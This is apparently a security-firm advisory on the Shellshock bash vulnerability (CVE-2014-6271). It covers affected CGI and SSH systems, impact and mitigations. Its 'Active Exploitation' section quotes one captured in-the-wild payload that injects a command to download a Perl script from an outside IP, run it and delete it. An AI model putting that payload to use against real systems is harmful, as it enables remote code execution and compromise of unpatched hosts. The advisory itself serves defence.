Current event – 1.2 of post

This is a current event and as such the blog post is subject to change over the course of the next few days as we perform further supplementary research and analysis by NCC Group’s Cyber Defence Operations and Security Consulting divisions.

v1.2 – Link to NCC Group North America subsidiaries analysis – here and details of an active exploitation attempt detected by NCC Group.

v1.1 – Apple Mac OS X mitigation linked and details of network appliance exploitation scenario

v1.0 – initial version

Background

On Tuesday CVE-2014-6271 was released with corresponding patch for bash (a common Linux shell). The risk arises from this vulnerability because of certain use cases. The use case of primary concern for the security of Internet facing infrastructure is where CGI (Common Gateway Interface) scripts are used. This is because user supplied data from the Internet via specially crafted requests can result in unauthorised code execution.

Further detailed technical analysis is available from Michal Zalewski of Google and the Redhat Team.

Affected Systems

Any system or product which uses CGI and the vulnerable version of bash is potentially affected. As busybox and other shells are not affected by this vulnerability it is NCC Group’s current opinion based on early analysis that the impact on smaller embedded systems should be less however network appliances are already being identified as vulnerable.

Impact of Exploitation

There is a risk for web sites which use CGI or hosts which allow untrusted users some degree of SSH access that it could result in unauthorised command execution. However this is not the only scope other systems may be affected which may not be immediately obvious.

We have seen examples of Linux based network appliances being vulnerable allowing underlying arbitrary command execution as root via an authenticated administration web interfaces. The result of such exploitation is the undermining the integrity of such appliances going forward due to the ability to perform actions the vendors did not intend.

Recommendations to Customers

NCC Group recommends that customers should in the short term:

Identify all Internet exposed systems which use CGI technology, provide restricted SSH access or otherwise passed user generated environment variables to scripts.
- Web servers
- Shell server
- Embedded products
- Identify internal affected systems and products
  - Working with vendors where required to have patches produced and support maintained
  - Deploy one or more mitigations as detailed by the Redhat Team including:
    - mod_security or other Web Application Firewall rules
    - IPTables rules
    - Deploy protective monitoring signatures, either for commercial IDS / IPS solutions or as documented by Steven Adair for either:
      - Suricata
      - Snort
      - For very technical Mac OS X users how to mitigate is documented on Stack Exchange which involves:
        Recompiling or using macports

Active Exploitation

NCC Group caught active exploitation by a spamming operation who used this payload:

“() { :;}; /bin/bash -c “cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur””

The perpetrator installed a python script that sends phishing mails, but the recipient list was only 5 email addresses, one of which was corrupt

Technical Analysis by NCC Group North America

NCC Group’s North America team, led by Tom Ritter, conducted analysis overnight and released a technical bulletin which can be found here. It examines:

Impact Determining Exposure
Patching
The Imperfect Fix
In The Wild Attacks
IDS Signatures and Detection

Further Updates

As further information becomes available we will update this post during the day.

Shellshock Bash Vulnerability